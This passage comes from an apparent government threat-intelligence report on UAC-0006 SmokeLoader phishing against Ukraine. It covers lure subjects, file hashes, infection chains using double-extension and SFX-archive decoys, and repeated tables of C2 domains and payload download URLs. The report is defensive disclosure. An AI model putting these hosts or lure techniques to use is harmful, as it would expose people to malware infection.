та рахунки за липень" (eng: "act of reconciliation and accounts for July",
translation from Ukrainian), "акт звірки та рахунки за июль" (eng: "act of
reconciliation and accounts for July", translation from mixed Ukrainian and
Russian) were detected by the CIROC SCPC SSSCIP on July 14, 2023. Tables 19 and
20 contain a brief overview of the applied attack vector and the sequence of the
infection chain that are relevant to this case.
Attack Vector
Infection Chain
df6a88f5ace3b06119c30539048a2d8724c511de287a43201c610ef236ca64b8
("Видаткова_накладная_№121_вiд_18_липня_2023p.zip") ->
b8a4c70fe729cbce02dc67b18ee0f8397834cd2067664363617567a255427242
("Список_рахункiв_до_оплати_вiд_12.07.2023.pdf") ->
890959904a520f2d99b2aee5763fec2a5cd0e490657aeed9e0a7a9ae60dde517
("Акт_звiрки_вiд_18_липня_2023p.pdf.js") +
a512209933998bcd0a07a16af04aa7fd05e3c23103978ad250a7e1cb249d4baa
("Видаткова_накладная_№121_вiд_18_липня_2023p.pdf.js") ->
ccf57eff80d10c7a3d6236802e91d4f60fbe68a8cca21d670ffdb7c6c6cb897b
(name format "<6-DIGID-CODE>.dat")
The phishing email (observed email subjects - "Fw: Re: Рахунок-фактура", "Fw:
Re: Счет-фактура", "Fw: Рахунок-фактура", "Fw: Счет-фактура", "Re:
Рахунок-фактура", "Re: Счет-фактура", "Re: акт звірки та рахунки",
"Счет-фактура", "акт звірки та рахунки за липень", "акт звірки та рахунки за
26
июль") contains .zip attachment [T1566.001] (polyglot archive
"Видаткова_накладная_№121_вiд_18_липня_2023p.zip" [T1036.008]), the
unpacking of which [T1204.002] results in the execution of one of the two
scenarios:
3) extracting "Видаткова_накладная_№121_вiд_18_липня_2023p.pdf" (RAR
archive). Opening the .pdf and clicking the link [T1204.001] initiates
sending the HTTP GET request to
hxxp://ukr-net-downloadfile[.]su/summary/php/form/name/2678564378
563745687972573056803845634865893456308567304433172310956230
5389264918164962463432343657384653904573897583674657365738945
7386/file/видаткова_накладная_№121_вiд_18_липня_2023р[.]html
resource (the response is received with a status code "HTTP 404 Not
Found" at the moment of the analysis);
4) extracting "Список_рахункiв_до_оплати_вiд_12.07.2023.pdf" (RAR
archive) that contains two .pdf.js files [T1036.007]
("Акт_звiрки_вiд_18_липня_2023p.pdf.js",
"Видаткова_накладная_№121_вiд_18_липня_2023p.pdf.js"). Opening either
of these two .pdf.js files through WScript.exe initiates sending the HTTP
GET request to
hxxp://mediaplatformapharm[.]ru/officedownloadfile/weboffice[.]exe
resourse. The response to this request with a status code "HTTP 200 OK" is
returned with the header value "Content-Type:
application/x-msdos-program" that results in downloading and further
execution of the files under the hidden folder AppData located in
C:\Users\%USERNAME%\AppData [T1564.001]
("C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Windows\Templ
ates\<6-DIGID-CODE>.dat" path).
Summarising the above, the initial email attachment can be opened in two ways.
27
Execution Scenario (2):
df6a88f5ace3b06119c30539048a2d8724c511de287a43201c610ef236ca64b8
("Видаткова_накладная_№121_вiд_18_липня_2023p.zip") ->
0d910dac90a30dec52c6484bd7087f4a1d55d827a093a2f43c9dfe59a082aab9
("Видаткова_накладная_№121_вiд_18_липня_2023p.pdf")
C2 Connections Configuration
http://metallergroup.ru/
http://infomailforyoumak.ru/
http://coinmakopenarea.su/
http://internetcygane.ru/
http://zallesman.ru/
http://maxteroper.ru/
http://kilomunara.com/
http://napropertyhub.eu/
http://nafillimonilini.net/
http://goodlenuxilam.site/
http://jimloamfilling.online/
http://vertusupportjk.org/
http://liverpulapp.ru/
http://zarabovannyok.eu/
http://cityofuganda.ug/
http://hillespostelnm.eu/
http://humanitarydp.ru/
http://zaikaopentra.com.ru/
http://zaikaopentra-com-ug.su/
http://jslopasitmon.com/
http://zaikadoctor.ru/
http://sismasterhome.ru/
http://supermarioprohozhdenie.ru/
http://krasavchikoleg.net/
http://samoramertut.ru/
http://polinamailserverip.ru/
http://lamazone.site/
http://criticalosl.tech/
http://maximprofile.net/
http://kismamabeforyougo.ru/
http://kissmafiabeforyoudied.ru/
http://gondurasonline.ru/
28
24 July 2023, "Wrong enrollment from 07.18.2023y."
The mass distribution of the SmokeLoader via phishing emails with the subject
"Помилкове зарахування вiд 18.07.2023p." (eng: "Wrong enrollment from
07.18.2023y.", translation from Ukrainian) was detected by the CIROC SCPC SSSCIP
on July 24, 2023. Tables 22 and 23 contain a brief overview of the applied attack
vector and the sequence of the infection chain that are relevant to this case.
Attack Vector
Infection Chain
349ea50d43d985a55694b440ca71062198a3c7a1f7764509970d37a054d04d2a
("Платiжна iнструкцiя iпн та вытяг з реестру Код документа 9312-0580-6944-3255.zip") ->
2010d6fef059516667897371bea5903489887851c08e0f925a5df49731ec9118
("Платiжна iнструкцiя iпн та вытяг з реестру Код документа 9312-0580-6944-3255.docx") ->
185b82b06a5bc2ccb5643440227293c7fa123216f7abfb685bdc0dc70dffdc37
("Pax_ipn_18.07.2023p.jpg") +
adebbe0faf94f6b0abff96cf9da38d4c845299c7fde240e389553bf847e3d238
("2.Витяг з реeстру вiд 24.07.2023р_Код документа 9312-0580-6944-3255.xls.js") +
fb7b8a4c761b04012aa384e35b219e1236dfb6639a08bddc85cd006f0ca92d9f
("1.Платiжна iнструкцiя iпн та вытяг з реестру Код документа 9312-0580-6944-3255.exe") ->
77690261ecfb2f864a587f81864a357088357db593d2e3892ac38fde2ea0597a
("document_payment.docx") +
27eda43b4fff19cc606f87414705cefa7271bd8f998176c2b49a5fc35bee5c21
("passport.bat")
29
9312-0580-6944-3255.exe" is a WinRAR SFX archive (see Fig. 9) that
contains .docx and .bat files (namely "document_payment.docx",
"passport.bat"), the opening of which through WinRAR application results
in simultaneous extraction and execution of these .docx and .bat files.
"document_payment.docx" here is a file decoy (the same as from
scenario(1) but with a different name), the purpose of which is to distract
the user's attention from the execution of a SmokeLoader sample. Figure 10
represents the content of the "passport.bat" file, in particular the
command that is expected to be executed by the default Windows
command-line interpreter [T1059.003] (running the program
"Pax_ipn_18.07.2023p.jpg").
Summarising the above, the initial email attachment can be opened in two ways.
30
fb7b8a4c761b04012aa384e35b219e1236dfb6639a08bddc85cd006f0ca92d9f
("1.Платiжна iнструкцiя iпн та вытяг з реестру Код документа 9312-0580-6944-3255.exe") ->
77690261ecfb2f864a587f81864a357088357db593d2e3892ac38fde2ea0597a
("document_payment.docx") +
27eda43b4fff19cc606f87414705cefa7271bd8f998176c2b49a5fc35bee5c21
("passport.bat")
C2 Connections Configuration
http://metallergroup.ru/
http://infomailforyoumak.ru/
http://coinmakopenarea.su/
http://internetcygane.ru/
http://zallesman.ru/
http://maxteroper.ru/
http://kilomunara.com/
http://napropertyhub.eu/
http://nafillimonilini.net/
http://goodlenuxilam.site/
http://jimloamfilling.online/
http://vertusupportjk.org/
http://liverpulapp.ru/
http://zarabovannyok.eu/
http://cityofuganda.ug/
http://hillespostelnm.eu/
http://humanitarydp.ru/
http://zaikaopentra.com.ru/
http://zaikaopentra-com-ug.su/
http://jslopasitmon.com/
http://zaikadoctor.ru/
http://sismasterhome.ru/
http://supermarioprohozhdenie.ru/
http://krasavchikoleg.net/
http://samoramertut.ru/
http://polinamailserverip.ru/
http://lamazone.site/
http://criticalosl.tech/
http://maximprofile.net/
http://kismamabeforyougo.ru/
http://kissmafiabeforyoudied.ru/
http://gondurasonline.ru/
31
CHRONOLOGY OF APPLIED ATTACK VECTORS
Figure 11 displays the timechart of the UAC-0006 activity cluster (by the number of
phishing incidents of specific attack chains), targeting Ukraine during August 2023.
30.08.2023
0 45 90
Figure 11. Timechart of the UAC-0006 activity cluster during August 2023
(by the number of incidents of specific attack chains)
17 - 20 August 2023, "Wrong enrollment from 15.08.2023y."
The mass distribution of the SmokeLoader via phishing emails with the subject
"Помилкове зарахування вiд 15.08.2023p." (eng: "Wrong enrollment from
15.08.2023y.", translation from Ukrainian) was detected by the CIROC SCPC SSSCIP
between 17 to 20 August 2023. Tables 25 and 26 contain a brief overview of the
applied attack vector and the sequence of the infection chain that are relevant to
this case.
Attack Vector
Infection Chain
eaaef25918f5de5a755c88813cba1ae5da87d98d49f903ed88ddd6f33029828d
("Платiжна iнструкцiя Код документа 9312_0580_6944_3255.Archive.lzh") ->
1409d44a8858a7ecd81e8eceab7314dee31e1f7622cc780df4adb68d71998494
("1.Платiжна iнструкцiя Код документа 9312_0580_6944_3255.lzh") ->
521526a7850de04b3cf1f592b932621a59e5af4b8d56e258443994edd42dbbce
("Pax_9312_0580_6944_3255_15.08.2023p.jpg") +
c8286ba2b48eded78d0f168a63a1da3311f298eecf95eb6de3de09ee18060fe6
("1.Платiжна iнструкцiя Код документа 9312_0580_6944_3255.pdf.exe") ->
0f438d68adc2af0ecafaacd25f42437d45fbe07ca4660bbec14ef246c57c7837
("Payment_9312_0580_6944_3255.bat") +
edfc02f5bb09b2c3871148d13f4bdcc2aa5444aa4dac170c8ab3342e353ce71a
("Payment_9312_0580_6944_3255.pdf")
33
sample. Figure 13 represents the content of the
"Payment_9312_0580_6944_3255.bat" file, in particular the command that is
expected to be executed by the default Windows command-line interpreter
[T1059.003] (running the program "Pax_9312_0580_6944_3255_15.08.2023p.jpg").
C2 Connections Configuration
http://metallergroup.ru/
http://infomailforyoumak.ru/
http://coinmakopenarea.su/
http://internetcygane.ru/
http://zallesman.ru/
http://maxteroper.ru/
http://kilomunara.com/
http://napropertyhub.eu/
http://nafillimonilini.net/
http://goodlenuxilam.site/
http://jimloamfilling.online/
http://vertusupportjk.org/
http://liverpulapp.ru/
http://zarabovannyok.eu/
http://cityofuganda.ug/
http://hillespostelnm.eu/
http://humanitarydp.ru/
34
http://zaikaopentra.com.ru/
http://zaikaopentra-com-ug.su/
http://jslopasitmon.com/
http://zaikadoctor.ru/
http://sismasterhome.ru/
http://supermarioprohozhdenie.ru/
http://krasavchikoleg.net/
http://samoramertut.ru/
http://polinamailserverip.ru/
http://lamazone.site/
http://criticalosl.tech/
http://maximprofile.net/
http://kismamabeforyougo.ru/
http://kissmafiabeforyoudied.ru/
http://gondurasonline.ru/
35
23 August 2023, "Wrong enrollment from 18.08.2023y."
The mass distribution of the SmokeLoader via phishing emails with the subject "-
"Помилкове зарахування вiд 18.08.2023p." (eng: "Wrong enrollment from
18.08.2023y.", translation from Ukrainian) was detected by the CIROC SCPC SSSCIP
on August 23, 2023. Tables 28 and 29 contain a brief overview of the applied attack
vector and the sequence of the infection chain that are relevant to this case.
Attack Vector
Infection Chain
516c6af2c65979227ea4b2f8c1750371303cf2ecb5025b1ed608f5a28cc1346c
("Рахунок_фактура_вiд_18_08_2023р_Помилкове_зарахування.zip") ->
0ee53f3a6faf252079b037fa8584101e966ec15e837228af1f5ba2631c473471
("1_Рахунок_фактура_вiд_18_08_2023р_Помилкове_зарахування.doc") ->
62bd1cc92bb049d37c1cac2612b052502b672a537ba7554fba8be7e4aeeab473
("Pax_18_08_23.jpg") +
442b6485fe11df3c6c52f5fbee5285e0c3f3008f76a0e01a1f471384d0540fea
("1_Рахунок_фактура_вiд_18_08_2023р_Помилкове_зарахування.pdf.exe") ->
5faa778677abf6b628c897d5059484a610178db2c085125a498ed9a313504c4e
("Payment_9312_0580_6944_3255.bat") +
896b510e9409232b53a6409a723c32468a83b7dfcdf1b0202dc1193f522152f5
("Payment_23_750_00_UAH.pdf")
36
file is a WinRAR SFX archive (see Fig. 14) that contains .bat and .pdf files
(namely "Payment_9312_0580_6944_3255.bat",
"Payment_23_750_00_UAH.pdf"), the opening of which through WinRAR
application results in simultaneous extraction and execution of these .bat
and .pdf files. "Payment_23_750_00_UAH.pdf" here is a file decoy, the
purpose of which is to distract the user's attention from the execution of a
SmokeLoader sample. Figure 15 represents the content of the
"Payment_9312_0580_6944_3255.bat" file, in particular the command that is
expected to be executed by the default Windows command-line
interpreter [T1059.003] (running the program "Pax_18_08_23.jpg").
"Pax_18_08_23.jpg" (file type - Win32 EXE) is the actual SmokeLoader sample, the
C2 configuration of which is represented in Table 30 [T1071.001] (totally 32
domains, 8 among which are active).
Summarising the above, the initial email attachment can be opened in two ways.
37
5faa778677abf6b628c897d5059484a610178db2c085125a498ed9a313504c4e
("Payment_9312_0580_6944_3255.bat") +
896b510e9409232b53a6409a723c32468a83b7dfcdf1b0202dc1193f522152f5
("Payment_23_750_00_UAH.pdf")
C2 Connections Configuration
http://privathostel.ru/
http://metallergroup.ru/
http://infomailforyoumak.ru/
http://coinmakopenarea.su/
http://internetcygane.ru/
http://zallesman.ru/
http://maxteroper.ru/
http://kilomunara.com/
http://napropertyhub.eu/
http://nafillimonilini.net/
http://goodlenuxilam.site/
http://jimloamfilling.online/
http://vertusupportjk.org/
http://liverpulapp.ru/
http://zarabovannyok.eu/
http://cityofuganda.ug/
http://hillespostelnm.eu/
http://humanitarydp.ru/
http://zaikaopentra.com.ru/
http://zaikaopentra-com-ug.su/
http://jslopasitmon.com/
http://zaikadoctor.ru/
http://sismasterhome.ru/
http://supermarioprohozhdenie.ru/
http://krasavchikoleg.net/
http://samoramertut.ru/
http://polinamailserverip.ru/
http://lamazone.site/
http://criticalosl.tech/
http://maximprofile.net/
http://kismamabeforyougo.ru/
http://kissmafiabeforyoudied.ru/
38
28 - 29 August 2023, "Wrong enrollment from 18.08.2023y."
The mass distribution of the SmokeLoader via phishing emails with the subject "-
"Помилкове зарахування вiд 18.08.2023p." (eng: "Wrong enrollment from
18.08.2023y.", translation from Ukrainian) was detected by the CIROC SCPC SSSCIP
between 28 to 29 August 2023. Tables 31 and 32 contain a brief overview of the
applied attack vector and the sequence of the infection chain that are relevant to
this case.
Attack Vector
Infection Chain
d9bf6e55e55693facd29fba24f2e3ec3e8d77dd6b34ef1cc18e1356b61635bec
("Рахунок_фактура_вiд_18_08_2023р_Помилкове_зарахування.zip") ->
1d64333eb62949ad379942983efadc9f7f9d34a1c96fd7beb8e23aa26b646524
("1_Рахунок_фактура_вiд_18_08_2023р_Помилкове_зарахування.pdf") ->
b82633a0808f72d19973fd16c441a1ea1b16fa1e96ef6c5aaece1894bc026d78
("Pax_18_08_23.jpg") +
442b6485fe11df3c6c52f5fbee5285e0c3f3008f76a0e01a1f471384d0540fea
("1_Рахунок_фактура_вiд_18_08_2023р_Помилкове_зарахування.pdf.exe") ->
5faa778677abf6b628c897d5059484a610178db2c085125a498ed9a313504c4e
("Payment_9312_0580_6944_3255.bat") +
896b510e9409232b53a6409a723c32468a83b7dfcdf1b0202dc1193f522152f5
("Payment_23_750_00_UAH.pdf")
39
execution of a SmokeLoader sample. Figure 17 represents the content of the
"Payment_9312_0580_6944_3255.bat" file, in particular the command that is
expected to be executed by the default Windows command-line interpreter
[T1059.003] (running the program "Pax_18_08_23.jpg").
"Pax_18_08_23.jpg" (file type - Win32 EXE) is the actual SmokeLoader sample, the
C2 configuration of which is represented in Table 33 [T1071.001] (totally 32
domains, 8 among which are active).
C2 Connections Configuration
http://privathostel.ru/
http://metallergroup.ru/
http://infomailforyoumak.ru/
http://coinmakopenarea.su/
http://internetcygane.ru/
http://zallesman.ru/
http://maxteroper.ru/
http://kilomunara.com/
http://napropertyhub.eu/
http://nafillimonilini.net/
http://goodlenuxilam.site/
http://jimloamfilling.online/
http://vertusupportjk.org/
http://liverpulapp.ru/
http://zarabovannyok.eu/
http://cityofuganda.ug/
40
http://hillespostelnm.eu/
http://humanitarydp.ru/
http://zaikaopentra.com.ru/
http://zaikaopentra-com-ug.su/
http://jslopasitmon.com/
http://zaikadoctor.ru/
http://sismasterhome.ru/
http://supermarioprohozhdenie.ru/
http://krasavchikoleg.net/
http://samoramertut.ru/
http://polinamailserverip.ru/
http://lamazone.site/
http://criticalosl.tech/
http://maximprofile.net/
http://kismamabeforyougo.ru/
http://kissmafiabeforyoudied.ru/
41
30 August 2023, "Bill for payment (natural gas) (PG) No.
806 dated August 24, 2023"
The mass distribution of the SmokeLoader via phishing emails with the subject
"Рахунок на оплату (природный газ) (ПГ) № 806 от 24 августа 2023" (eng:
"Bill for payment (natural gas) (PG) No. 806 dated August 24, 2023", translation
from mixed Ukrainian and Russian) was detected by the CIROC SCPC SSSCIP on
August 30, 2023. Tables 34 and 35 contain a brief overview of the applied attack
vector and the sequence of the infection chain that are relevant to this case.
Attack Vector
Infection Chain
5eb5193820a82fc3be2483bfd9658a84b2562110b538404b36454b7a310e918e
("Рахунок_до_оплати_000120-806_от_24_августа_2023.zip") ->
e7062d6a5bfaa7f4128d53e1d9e2de7321e05d23f073ab147f5e2cf202c78a94
("Рахунок_до_оплати_000120-806_от_24_августа_2023.pdf.exe") ->
17f8550a294b8d451e7fdd38c7acc759402ef42547ec4905d7abe796e49f2d0e
("pax.exe") +
d973a48f2a741deb243b6765e23034ba864fb5e1fe2f7e3dd0ac7321b14ec706
("рах.pdf")
42
Figure 18. WinRAR SFX archive attachments
"pax.exe" (file type - Win32 EXE) is the actual SmokeLoader sample, the C2
configuration of which is represented in Table 36 [T1071.001] (totally 32 domains, 8
among which are active).
Summarising the above, the initial email attachment can be opened in two ways.
C2 Connections Configuration
http://privathostel.ru/
http://metallergroup.ru/
http://infomailforyoumak.ru/
http://coinmakopenarea.su/
http://internetcygane.ru/
http://zallesman.ru/
http://maxteroper.ru/
http://kilomunara.com/
http://napropertyhub.eu/
http://nafillimonilini.net/
http://goodlenuxilam.site/
http://jimloamfilling.online/
http://vertusupportjk.org/
http://liverpulapp.ru/
43
http://zarabovannyok.eu/
http://cityofuganda.ug/
http://hillespostelnm.eu/
http://humanitarydp.ru/
http://zaikaopentra.com.ru/
http://zaikaopentra-com-ug.su/
http://jslopasitmon.com/
http://zaikadoctor.ru/
http://sismasterhome.ru/
http://supermarioprohozhdenie.ru/
http://krasavchikoleg.net/
http://samoramertut.ru/
http://polinamailserverip.ru/
http://lamazone.site/
http://criticalosl.tech/
http://maximprofile.net/
http://kismamabeforyougo.ru/
http://kissmafiabeforyoudied.ru/
44
CHRONOLOGY OF APPLIED ATTACK VECTORS
Figure 19 displays the timechart of the UAC-0006 activity cluster (by the number of
phishing incidents of specific attack chains), targeting Ukraine during September 2023.
20.09.2023
0 30 60
Figure 19. Timechart of the UAC-0006 activity cluster during September 2023
(by the number of phishing incidents of specific attack chains)
19 - 20 September 2023, "Fw: Bill to pay"
The mass distribution of the SmokeLoader via phishing emails with the subject
"Fw: Рахунок до оплати" ("Fw: Bill to pay", translation from Ukrainian) was
detected by the CIROC SCPC SSSCIP between 19 to 20 September 2023. Tables 37
and 38 contain a brief overview of the applied attack vector and the sequence of
the infection chain that are relevant to this case.
Attack Vector
Infection Chain
0a83fcb0b40f35bf6020ad35cedf56b72a6f650a46dc781b2ea1c9647e0f76cc
("Рахунок_до_оплати_389.zip") ->
7d7262ab5298abd0e91b6831e37ef0156ded4fdceeaf8f8841c9a80d31f33f8e
("Рахунок_до_оплати_389.pdf") ->
cfc44f1399e3d28e55c32bcc73539358e5ac88c0d6a19188a52b161b506bea91
("Рахунок_до_оплати_389.exe") ->
a8a3130c779904e23b50d69b4e73a714b345e296feebb9f64a732d5c73e7973b
("pax_389.exe") +
b24c99ca816f7ac8ca87a352ed4f44be9d8a21519dd1f408739da958b580be0c
("389.pdf")
The phishing email (observed email subject - "Fw: Рахунок до оплати") contains
.zip attachment (ZIP archive "Рахунок_до_оплати_389.zip") [T1566.001], the
unpacking of which [T1204.002] results in in extracting the .pdf file (ZIP archive
"Рахунок_до_оплати_389.pdf") that, in turn, contains the .exe file (namely
"Рахунок_до_оплати_389.exe"). "Рахунок_до_оплати_389.exe" file is a WinRAR
SFX archive (see Fig. 20) that contains .exe and .pdf files (namely "pax_389.exe",
"389.pdf"), the opening of which through the WinRAR application results in
simultaneous extraction and execution of these .exe and .pdf files. "389.pdf" here is
a file decoy, the purpose of which is to distract the user's attention from the
execution of a SmokeLoader sample.
46
Figure 20. WinRAR SFX archive attachments
"pax_389.exe" (file type - Win32 EXE) is the actual SmokeLoader sample, the C2
configuration of which is represented in Table 39 [T1071.001] (totally 19 domains, 6
among which are active).
C2 Connections Configuration
http://dublebomber.ru/
http://yavasponimayu.ru/
http://nomnetozhedenyuzhkanuzhna.ru/
http://prostosmeritesya.ru/
http://ipoluchayteudovolstvie.ru/
http://super777bomba.ru/
http://specnaznachenie.ru/
http://zakrylki809.ru/
http://propertyminsk.by/
http://iloveua.ir/
http://moyabelorussiya.by/
http://tvoyaradostetoya.ru/
http://zasadacafe.by/
http://restmantra.by/
http://kozachok777.ru/
http://propertyiran.ir/
http://sakentoshi.ru/
http://popuasyfromua.ru/
http://diplombar.by/
47
20 September 2023, "Re: Bill to pay"
The mass distribution of the SmokeLoader via phishing emails with the subject "-
"Re: Рахунок до оплати" ("Re: Bill to pay", translation from Ukrainian) was
detected by the CIROC SCPC SSSCIP on September 20, 2023. Tables 40 and 41
contain a brief overview of the applied attack vector and the sequence of the
infection chain that are relevant to this case.
Attack Vector
Infection Chain
1e30979ec6e93d9d06d463f763e1f739ea03634a36c8bae7891736b77037d4f9
("Рахунок_фактура_ЖГ-0011297_20.09.2023_p.zip") ->
216423e9f9f1a12d8210dc5527d502cf263f5e0427136ee737089dab667361df
("Рахунок_фактура_ЖГ-0011297_20.09.2023p_Договiр_аренди.pdf") ->
dcf79b5721db7b447286a8d1d1e674faaff9caeac48d1e3ce8dbece579849945
("Договір аренди.docx") +
25f828b244c99d77ad60ff641d388b20bbcee445c33cdc0d8616e8e55e1ba834
("Рахунок_фактура_ЖГ-0011297_20.09.2023p_number_003642763872462876427645735.pdf.exe")
->
8f0d1e93eebb79a22158a501d3bfcb2251949f121f86c1d34468cbe260faed18
("pax2.exe") +
63bb18e5ccfb5c45ec0870a6b5b3b936e4e549005d6ccd0850b099c59aa8946e
("pax1.pdf")
The phishing email (observed email subject - "Re: Рахунок до оплати") contains
.zip attachment [T1566.001] (polyglot archive
"Рахунок_фактура_ЖГ-0011297_20.09.2023_p.zip" [T1036.008]), the unpacking
of which [T1204.002] results in the execution of one of the two scenarios:
5) extracting the .docx file "Договір аренди.docx" that contains no signs of
the malicious code;
6) extracting the .pdf file (ZIP archive
"Рахунок_фактура_ЖГ-0011297_20.09.2023p_Договiр_аренди.pdf")
containing .docx and .pdf.exe files [T1036.007] (namely "Договір
аренди.docx",
"Рахунок_фактура_ЖГ-0011297_20.09.2023p_number_003642763872462
